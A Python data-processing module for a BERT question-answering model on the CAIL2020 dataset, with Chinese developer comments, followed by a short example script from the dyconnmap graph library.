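# " ".join(tokenizer.tokenize("1895")) lets the span shrink to just the "1895" pieces when
# such a match exists; otherwise the original (input_start, input_end) is returned unchanged.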
class Data:
"""Data processor for BERT and RNN model for SMP-CAIL2020-Argmine.
Attributes:
model_type: 'bert' or 'rnn'
max_seq_len: int, default: 512
tokenizer: BertTokenizer for bert
Tokenizer for rnn
"""
def __init__(self,
vocab_file='',
max_seq_len: int = 512,
model_type: str = 'bert', config=None):
"""Initialize data processor for SMP-CAIL2020-Argmine.
Args:
vocab_file: one word each line
max_seq_len: max sequence length, default: 512
model_type: 'bert' or 'rnn'
If model_type == 'bert', use BertTokenizer as tokenizer
Otherwise, use Tokenizer as tokenizer
"""
self.model_type = model_type
if self.model_type == 'bert':
self.tokenizer = BertTokenizer.from_pretrained(config.bert_model_path)#BertTokenizer(vocab_file)
else: # rnn
self.tokenizer = Tokenizer(vocab_file)
self.max_seq_len = max_seq_len
def load_file(self,
file_path='SMP-CAIL2020-train.csv',
train=True) -> TensorDataset:
"""Load SMP-CAIL2020-Argmine train file and construct TensorDataset.
Args:
file_path: train file with last column as label
train:
If True, train file with last column as label
Otherwise, test file without last column as label
Returns:
BERT model:
Train:
torch.utils.data.TensorDataset
each record: (input_ids, input_mask, segment_ids, label)
Test:
torch.utils.data.TensorDataset
each record: (input_ids, input_mask, segment_ids)
RNN model:
Train:
torch.utils.data.TensorDataset
each record: (s1_ids, s2_ids, s1_length, s2_length, label)
Test:
torch.utils.data.TensorDataset
each record: (s1_ids, s2_ids, s1_length, s2_length)
"""
examples, features_list = self._load_file1(file_path, train)
# if self.model_type == 'bert':
dataset = self._convert_sentence_pair_to_bert_dataset(
features_list)
# else: # rnn
# dataset = self._convert_sentence_pair_to_rnn_dataset(
# sc_list, bc_list, label_list)
return examples, features_list, dataset
def load_train_and_valid_files(self, train_file, valid_file):
"""Load all files for SMP-CAIL2020-Argmine.
Args:
train_file, valid_file: files for SMP-CAIL2020-Argmine
Returns:
train_set, valid_set_train, valid_set_valid
all are torch.utils.data.TensorDataset
"""
print('Loading train records for train...')
train_exam, train_feat, train_set = self.load_file(train_file, True)
print(len(train_set), 'training records loaded.')
# print('Loading train records for valid...')
# train_exam, train_feat, valid_set_train = self.load_file(train_file, False)
# print(len(valid_set_train), 'train records loaded.')
print('Loading valid records...')
valid_exam, valid_feat, valid_set_valid = self.load_file(valid_file, False)
print(len(valid_set_valid), 'valid records loaded.')
return train_set, train_set, valid_set_valid, train_exam, valid_exam, train_feat, valid_feat
def _load_file(self, filename, train: bool = True):
"""Load SMP-CAIL2020-Argmine train/test file.
For train file,
The ratio between positive samples and negative samples is 1:4
Copy positive 3 times so that positive:negative = 1:1
Args:
filename: SMP-CAIL2020-Argmine file
train:
If True, train file with last column as label
Otherwise, test file without last column as label
Returns:
sc_list, bc_list, label_list with the same length
sc_list, bc_list: List[List[str]], list of word tokens list
label_list: List[int], list of labels
"""
data_frame = pd.read_csv(filename)
sc_list, bc_list, label_list = [], [], []
for row in data_frame.itertuples(index=False):
# candidates = row[0:2]
answer = bool(row[-1]) if train else None
sc_tokens = self.tokenizer.tokenize(row[0])
bc_tokens = self.tokenizer.tokenize(row[1])
label = 1 if answer else 0
sc_list.append(sc_tokens)
bc_list.append(bc_tokens)
if train:
label_list.append(label)
# for i, _ in enumerate(candidates):
# bc_tokens = self.tokenizer.tokenize(candidates[i])
# if train:
# if i + 1 == answer:
# # Copy positive sample 4 times
# for _ in range(len(candidates) - 1):
# sc_list.append(sc_tokens)
# bc_list.append(bc_tokens)
# label_list.append(1)
# else:
# sc_list.append(sc_tokens)
# bc_list.append(bc_tokens)
# label_list.append(0)
# else: # test
# sc_list.append(sc_tokens)
# bc_list.append(bc_tokens)
return sc_list, bc_list, label_list
def _load_file1(self, filename, train: bool = True):
with open(filename, 'r', encoding='utf-8') as reader:
full_data = json.load(reader) # 完整的原始数据
def is_whitespace(c):
if c.isspace() or ord(c) == 0x202F or ord(c) == 0x2000:
return True
return False
cnt = 0
examples = []
for case in tqdm(full_data): # 遍历每个样本
key = case['_id']
qas_type = "" # case['type']
sup_facts = set([(sp[0], sp[1]) for sp in case['supporting_facts']]) # TODO: 为啥是个集合?为了去重?
sup_titles = set([sp[0] for sp in case['supporting_facts']]) # sup para 的title 列表
orig_answer_text = case['answer']
sent_id = 0
doc_tokens = []
sent_names = []
sup_facts_sent_id = []
sent_start_end_position = []
para_start_end_position = []
entity_start_end_position = []
ans_start_position, ans_end_position = [], []
JUDGE_FLAG = orig_answer_text == 'yes' or orig_answer_text == 'no' or orig_answer_text == 'unknown' or orig_answer_text == "" # judge_flag??
FIND_FLAG = False
char_to_word_offset = [] # Accumulated along all sentences
prev_is_whitespace = True
# for debug
titles = set()
para_data = case['context']
for paragraph in para_data: # 选中的段落
title = paragraph[0]
sents = paragraph[1] # 句子列表
# ratio = (sum([len(sent) for sent in sents]) + len(case['question'])) * 1.0 / 512
# sents = [dynamic_fit_bert_size(sent, ratio) for sent in sents]
titles.add(title) # 选中的title
is_gold_para = 1 if title in sup_titles else 0 # 是否是gold para
para_start_position = len(doc_tokens) # 刚开始doc_tokens是空的
for local_sent_id, sent in enumerate(sents): # 处理段落的每个句子
if local_sent_id >= max_support_sents: # 句子数量限制:一个段落最多只允许44个句子
break
# Determine the global sent id for supporting facts
local_sent_name = (title, local_sent_id) # (title, 句子在段落中的位置)
sent_names.append(local_sent_name) # 作为句子的名字
if local_sent_name in sup_facts:
sup_facts_sent_id.append(sent_id) # TODO: 这个跟原始的sup标签有啥区别
sent_id += 1 # 这个句子的id是以整个article为范围的,为什么?
sent = " ".join(sent)
sent += " "
sent_start_word_id = len(doc_tokens) # 句子开始位置的word id
sent_start_char_id = len(char_to_word_offset) # 句子开始位置的char id
for c in sent: # 遍历整个句子的字符,建立char到word之间的映射关系
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
sent_end_word_id = len(doc_tokens) - 1 # 句子结尾的word位置
sent_start_end_position.append((sent_start_word_id, sent_end_word_id)) # 句子开始和结束的位置,以元组形式保存
# Answer char position
answer_offsets = []
offset = -1
tmp_answer = " ".join(orig_answer_text)
while True:
offset = sent.find(tmp_answer, offset + 1)
if offset != -1:
valid=False
for sup_id in sup_facts_sent_id:
start_, end_ = sent_start_end_position[sup_id]
if offset >= start_ and offset <= end_:
valid=True
if valid:
answer_offsets.append(offset) # 把所有相同答案的开始位置都找到
else:
break
# answer_offsets = [m.start() for m in re.finditer(orig_answer_text, sent)]
if not JUDGE_FLAG and not FIND_FLAG and len(answer_offsets) > 0:
FIND_FLAG = True # 标志找到了答案,TODO:这个有啥用
for answer_offset in answer_offsets:
start_char_position = sent_start_char_id + answer_offset # 答案开始的char位置
end_char_position = start_char_position + len(tmp_answer) - 1 # 答案结束的char位置
# 答案开始的token位置,每个答案都保存
ans_start_position.append(char_to_word_offset[start_char_position])
ans_end_position.append(char_to_word_offset[end_char_position])
# Truncate longer document
if len(doc_tokens) >= 460: # 如果大于382个词则break
# 这个截断会让每个段落至少有一个句子被加入,即使整个样本已经超过382,这样后面匹配entity还能匹配上吗?
break
# 问题改写
# case['question'] = dynamic_fit_bert_size(case['question'], ratio)
if len(case['question']) > 50:
case['question'] = case['question'][-50:]
para_end_position = len(doc_tokens) - 1
# 一个段落的开始和结束token位置(白空格分词)
para_start_end_position.append(
(para_start_position, para_end_position, title, is_gold_para)) # 顺便加上开始和结束位置
if len(ans_end_position) > 1:
cnt += 1 # 如果答案结束的位置大于1,cnt+1,如果答案结束位置是0呢?
if key < 10:
print("qid {}".format(key))
print("qas type {}".format(qas_type))
print("doc tokens {}".format(doc_tokens))
print("question {}".format(case['question']))
print("sent num {}".format(sent_id + 1))
print("sup face id {}".format(sup_facts_sent_id))
print("para_start_end_position {}".format(para_start_end_position))
print("sent_start_end_position {}".format(sent_start_end_position))
print("entity_start_end_position {}".format(entity_start_end_position))
print("orig_answer_text {}".format(orig_answer_text))
print("ans_start_position {}".format(ans_start_position))
print("ans_end_position {}".format(ans_end_position))
# 一个paragraph是一个example
example = Example(
qas_id=key,
qas_type=qas_type,
doc_tokens=doc_tokens,
question_text=case['question'],
sent_num=sent_id + 1,
sent_names=sent_names,
sup_fact_id=sup_facts_sent_id,
para_start_end_position=para_start_end_position, # 一个样本是一个article, 有多个段落开始和结束的位置
sent_start_end_position=sent_start_end_position,
entity_start_end_position=entity_start_end_position,
orig_answer_text=orig_answer_text,
start_position=ans_start_position, # 这里是word的开始和结束位置
end_position=ans_end_position)
examples.append(example)
features_list = self.convert_examples_to_features(examples, self.tokenizer, 512, 50)
return examples, features_list
def convert_examples_to_features(self, examples, tokenizer, max_seq_length, max_query_length):
# max_query_length = 50
features = []
failed = 0
for (example_index, example) in enumerate(tqdm(examples)): # 遍历所有的example
if example.orig_answer_text == 'yes':
ans_type = 1
elif example.orig_answer_text == 'no':
ans_type = 2
elif example.orig_answer_text == 'unknown':
ans_type = 3
else:
ans_type = 0 # 统计answer type
query_tokens = ["[CLS]"]
for token in example.question_text.split(' '):
query_tokens.extend(tokenizer.tokenize(token))
if len(query_tokens) > max_query_length - 1:
query_tokens = query_tokens[:max_query_length - 1]
query_tokens.append("[SEP]")
# para_spans = []
# entity_spans = []
sentence_spans = []
all_doc_tokens = []
orig_to_tok_index = []
orig_to_tok_back_index = []
tok_to_orig_index = [0] * len(query_tokens)
all_doc_tokens = ["[CLS]"] # 这一段不是啰嗦的代码吗
for token in example.question_text.split(' '):
all_doc_tokens.extend(tokenizer.tokenize(token))
if len(all_doc_tokens) > max_query_length - 1:
all_doc_tokens = all_doc_tokens[:max_query_length - 1]
all_doc_tokens.append("[SEP]")
for (i, token) in enumerate(example.doc_tokens): # 遍历context的所有token(白空格分割)
orig_to_tok_index.append(len(all_doc_tokens)) # 空格分词的token与wp分词后的token对应
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
tok_to_orig_index.append(i) # wp 分词后的token对应的空格分词的token
all_doc_tokens.append(sub_token)
orig_to_tok_back_index.append(len(all_doc_tokens) - 1) # 这个看意思应该是原始token与wp分词后的最后一个subtoken对应?
def relocate_tok_span(orig_start_position, orig_end_position, orig_text):
# word的(在para中的)开始和结束位置
if orig_start_position is None: # 如果输入的是none,返回0,实际上不会存在这种情况
return 0, 0
tok_start_position = orig_to_tok_index[orig_start_position]
if orig_end_position < len(example.doc_tokens) - 1: # 如果结束位置没有超出了边界
tok_end_position = orig_to_tok_index[orig_end_position + 1] - 1
else:
tok_end_position = len(all_doc_tokens) - 1 # 超出边界
# Make answer span more accurate.
return _improve_answer_span(
all_doc_tokens, tok_start_position, tok_end_position, tokenizer, orig_text)
ans_start_position, ans_end_position = [], []
for ans_start_pos, ans_end_pos in zip(example.start_position, example.end_position): # 遍历每一个答案开始和结束位置
s_pos, e_pos = relocate_tok_span(ans_start_pos, ans_end_pos, example.orig_answer_text)
ans_start_position.append(s_pos) # 这里返回的是答案在bert输入中的位置
ans_end_position.append(e_pos)
# for entity_span in example.entity_start_end_position:
# ent_start_position, ent_end_position \
# = relocate_tok_span(entity_span[0], entity_span[1], entity_span[2])
# entity_spans.append((ent_start_position, ent_end_position, entity_span[2], entity_span[3]))
# 这里找到了每个实体在bert输入中的开始和结束位置
for sent_span in example.sent_start_end_position: # 每个句子开始和结束word的id
if sent_span[0] >= len(orig_to_tok_index) or sent_span[0] >= sent_span[1]:
continue # 如果句子的开始位置大于映射表的范围,或者开始与结束位置相同(空句子),就continue
sent_start_position = orig_to_tok_index[sent_span[0]] # 句子在bert输入中的开始和结束位置
sent_end_position = orig_to_tok_back_index[
sent_span[1]] # 句子结束的sub word位置(这里就是orig_to_tok_back_index的用处)
sentence_spans.append((sent_start_position, sent_end_position)) # 句子在bert输入中的开始和结束位置
# for para_span in example.para_start_end_position:
# if para_span[0] >= len(orig_to_tok_index) or para_span[0] >= para_span[1]:
# continue
# para_start_position = orig_to_tok_index[para_span[0]]
# para_end_position = orig_to_tok_back_index[para_span[1]]
# para_spans.append((para_start_position, para_end_position, para_span[2], para_span[3])) # 3是是否是sup para
# Padding Document
all_doc_tokens = all_doc_tokens[:max_seq_length - 1] + ["[SEP]"]
doc_input_ids = tokenizer.convert_tokens_to_ids(all_doc_tokens)
query_input_ids = tokenizer.convert_tokens_to_ids(query_tokens)
doc_input_mask = [1] * len(doc_input_ids)
doc_segment_ids = [0] * len(query_input_ids) + [1] * (len(doc_input_ids) - len(query_input_ids))
while len(doc_input_ids) < max_seq_length:
doc_input_ids.append(0)
doc_input_mask.append(0)
doc_segment_ids.append(0)
# Padding Question
query_input_mask = [1] * len(query_input_ids)
query_segment_ids = [0] * len(query_input_ids)
while len(query_input_ids) < max_query_length:
query_input_ids.append(0)
query_input_mask.append(0)
query_segment_ids.append(0)
assert len(doc_input_ids) == max_seq_length
assert len(doc_input_mask) == max_seq_length
assert len(doc_segment_ids) == max_seq_length
assert len(query_input_ids) == max_query_length
assert len(query_input_mask) == max_query_length
assert len(query_segment_ids) == max_query_length
sentence_spans = get_valid_spans(sentence_spans, max_seq_length)
# para_spans = get_valid_spans(para_spans, max_seq_length)
sup_fact_ids = example.sup_fact_id
sent_num = len(sentence_spans)
sup_fact_ids = [sent_id for sent_id in sup_fact_ids if sent_id < sent_num]
if len(sup_fact_ids) != len(example.sup_fact_id):
failed += 1
if example.qas_id < 10:
print("qid {}".format(example.qas_id))
print("all_doc_tokens {}".format(all_doc_tokens))
print("doc_input_ids {}".format(doc_input_ids))
print("doc_input_mask {}".format(doc_input_mask))
print("doc_segment_ids {}".format(doc_segment_ids))
print("query_tokens {}".format(query_tokens))
print("query_input_ids {}".format(query_input_ids))
print("query_input_mask {}".format(query_input_mask))
print("query_segment_ids {}".format(query_segment_ids))
# print("para_spans {}".format(para_spans))
print("sentence_spans {}".format(sentence_spans))
# print("entity_spans {}".format(entity_spans))
print("sup_fact_ids {}".format(sup_fact_ids))
print("ans_type {}".format(ans_type))
print("tok_to_orig_index {}".format(tok_to_orig_index))
print("ans_start_position {}".format(ans_start_position))
print("ans_end_position {}".format(ans_end_position))
features.append(
InputFeatures(qas_id=example.qas_id,
doc_tokens=all_doc_tokens,
doc_input_ids=doc_input_ids,
doc_input_mask=doc_input_mask,
doc_segment_ids=doc_segment_ids,
query_tokens=query_tokens,
query_input_ids=query_input_ids,
query_input_mask=query_input_mask,
query_segment_ids=query_segment_ids,
sent_spans=sentence_spans,
sup_fact_ids=sup_fact_ids,
ans_type=ans_type,
token_to_orig_map=tok_to_orig_index,
start_position=ans_start_position,
end_position=ans_end_position)
)
return features
def _convert_sentence_pair_to_bert_dataset(
self, features_list):
"""Convert sentence pairs to dataset for BERT model.
Args:
sc_list, bc_list: List[List[str]], list of word tokens list
label_list: train: List[int], list of labels
test: []
Returns:
Train:
torch.utils.data.TensorDataset
each record: (input_ids, input_mask, segment_ids, label)
Test:
torch.utils.data.TensorDataset
each record: (input_ids, input_mask, segment_ids)
"""
IGNORE_INDEX = -100
max_seq_len = 512
sent_limit = max_support_sents
max_query_len = 50
doc_input_ids, doc_input_mask, doc_segment_ids, query_mapping = [],[],[],[]
start_mapping, all_mapping, is_support = [], [], []
y1, y2, ids, q_type = [], [], [], []
tok_to_orig_index = []
for i, features in tqdm(enumerate(features_list), ncols=80):
doc_input_ids.append(features.doc_input_ids)
doc_input_mask.append(features.doc_input_mask)
doc_segment_ids.append(features.doc_segment_ids)
query_mapping_ = torch.Tensor(max_seq_len)
if len(features.token_to_orig_map) <= 512:
features.token_to_orig_map = features.token_to_orig_map + [0]*(512-len(features.token_to_orig_map))
features.token_to_orig_map = features.token_to_orig_map[:512]
tok_to_orig_index.append(features.token_to_orig_map)
start_mapping_ = torch.Tensor(sent_limit, max_seq_len)
all_mapping_ = torch.Tensor(max_seq_len, sent_limit)
is_support_ = [0] * sent_limit
for mapping in [start_mapping_, all_mapping_, query_mapping_]:
mapping.zero_() # 把几个mapping都初始化为0
for j in range(features.sent_spans[0][0] - 1):
query_mapping_[j] = 1
query_mapping.append(query_mapping_.unsqueeze(dim=0))
if features.ans_type == 0:
if len(features.end_position) == 0:
y1.append(0)
y2.append(0) # 如果结束位置是0,span的标签就为0
elif features.end_position[0] < max_seq_len:
y1.append(features.start_position[0]) # 只用第一个找到的span
y2.append(features.end_position[0])
else:
y1.append(0)
y2.append(0)
else:
y1.append(IGNORE_INDEX) # span是-100
y2.append(IGNORE_INDEX)
q_type.append(features.ans_type) # 这个明明是answer_type,非要叫q_type
ids.append(features.qas_id)
for j, sent_span in enumerate(features.sent_spans[:sent_limit]): # 句子序号,span
is_sp_flag = j in features.sup_fact_ids # 这个代码写的真几把烂#我也觉得
start, end = sent_span
# if start < end: # 还有start大于end的时候?
is_support_[j] = int(is_sp_flag) # 样本i的第j个句子是否是sp
all_mapping_[start:end + 1, j] = 1 # (batch_size, max_seq_len, 20) 第j个句子开始和结束全为1
start_mapping_[j, start] = 1 # (batch_size, 20, max_seq_len)
is_support.append(is_support_)
start_mapping.append(start_mapping_.unsqueeze(dim=0))
all_mapping.append(all_mapping_.unsqueeze(dim=0))
context_idxs = torch.tensor(doc_input_ids, dtype=torch.long)
context_mask = torch.tensor(doc_input_mask, dtype=torch.long)
segment_idxs = torch.tensor(doc_segment_ids, dtype=torch.long)
tok_to_orig_index = torch.tensor(tok_to_orig_index, dtype=torch.long)
query_mapping = torch.cat(query_mapping, dim=0)
start_mapping = torch.cat(start_mapping, dim=0)
all_mapping = torch.cat(all_mapping, dim=0)
ids = torch.tensor(ids, dtype=torch.long)
y1 = torch.tensor(y1, dtype=torch.long)
y2 = torch.tensor(y2, dtype=torch.long)
q_type = torch.tensor(q_type, dtype=torch.long)
is_support = torch.tensor(is_support, dtype=torch.long)
return TensorDataset(
context_idxs, context_mask, segment_idxs,
query_mapping, all_mapping,
ids, y1, y2, q_type,
start_mapping,
is_support,tok_to_orig_index
)
def _convert_sentence_pair_to_rnn_dataset(
self, s1_list, s2_list, label_list=None):
"""Convert sentences pairs to dataset for RNN model.
Args:
sc_list, bc_list: List[List[str]], list of word tokens list
label_list: train: List[int], list of labels
test: []
Returns:
Train:
torch.utils.data.TensorDataset
each record: (s1_ids, s2_ids, s1_length, s2_length, label)
Test:
torch.utils.data.TensorDataset
each record: (s1_ids, s2_ids, s1_length, s2_length, label)
"""
all_s1_ids, all_s2_ids = [], []
all_s1_lengths, all_s2_lengths = [], []
for i in tqdm(range(len(s1_list)), ncols=80):
tokens_s1, tokens_s2 = s1_list[i], s2_list[i]
all_s1_lengths.append(min(len(tokens_s1), self.max_seq_len))
all_s2_lengths.append(min(len(tokens_s2), self.max_seq_len))
if len(tokens_s1) > self.max_seq_len:
tokens_s1 = tokens_s1[:self.max_seq_len]
if len(tokens_s2) > self.max_seq_len:
tokens_s2 = tokens_s2[:self.max_seq_len]
s1_ids = self.tokenizer.convert_tokens_to_ids(tokens_s1)
s2_ids = self.tokenizer.convert_tokens_to_ids(tokens_s2)
if len(s1_ids) < self.max_seq_len:
s1_ids += [0] * (self.max_seq_len - len(s1_ids))
if len(s2_ids) < self.max_seq_len:
s2_ids += [0] * (self.max_seq_len - len(s2_ids))
all_s1_ids.append(s1_ids)
all_s2_ids.append(s2_ids)
all_s1_ids = torch.tensor(all_s1_ids, dtype=torch.long)
all_s2_ids = torch.tensor(all_s2_ids, dtype=torch.long)
all_s1_lengths = torch.tensor(all_s1_lengths, dtype=torch.long)
all_s2_lengths = torch.tensor(all_s2_lengths, dtype=torch.long)
if label_list: # train
all_label_ids = torch.tensor(label_list, dtype=torch.long)
return TensorDataset(
all_s1_ids, all_s2_ids, all_s1_lengths, all_s2_lengths,
all_label_ids)
# test
return TensorDataset(
all_s1_ids, all_s2_ids, all_s1_lengths, all_s2_lengths)
def test_data():
"""Test for data module."""
# For BERT model
data = Data('model/bert/vocab.txt', model_type='bert')
_, _, _ = data.load_train_and_valid_files(
'SMP-CAIL2020-train.csv',
'SMP-CAIL2020-test1.csv')
# For RNN model
data = Data('model/rnn/vocab.txt', model_type='rnn')
_, _, _ = data.load_train_and_valid_files(
'SMP-CAIL2020-train.csv',
'SMP-CAIL2020-test1.csv')
if __name__ == '__main__':
test_data()
| [
"[email protected]"
] | |
f13ae364d5454fff0b466fd17c8c4e70af0a9e2e | e836275adf8adca9b77acdd3d25bac157592a995 | /examples/graphs_nodal.py | fa9e8e4ec004f0a57bfd774033e20c44044346d4 | [
"BSD-3-Clause"
] | permissive | makism/dyconnmap | 3de6f482d1370bf25ec3813ddf576b675ed99d9e | cbef247e635d55cb1489ba1e429d9d472b501b56 | refs/heads/master | 2023-08-03T19:30:40.779333 | 2022-03-14T18:24:16 | 2022-03-14T18:24:16 | 98,643,787 | 67 | 25 | BSD-3-Clause | 2023-07-24T04:49:03 | 2017-07-28T11:37:17 | Python | UTF-8 | Python | false | false | 360 | py | # -*- coding: utf-8 -*-
from dyconnmap.graphs import nodal_global_efficiency
import numpy as np
if __name__ == '__main__':
rng = np.random.RandomState(0)
mtx = rng.rand(64, 64)
mtx_symm = (mtx + mtx.T)/2
np.fill_diagonal(mtx_symm, 1.0)
inv_fcg = 1.0 / mtx_symm
    nodal_ge = nodal_global_efficiency(inv_fcg)  # reuse the precomputed inverse
print(nodal_ge)
| [
"[email protected]"
] |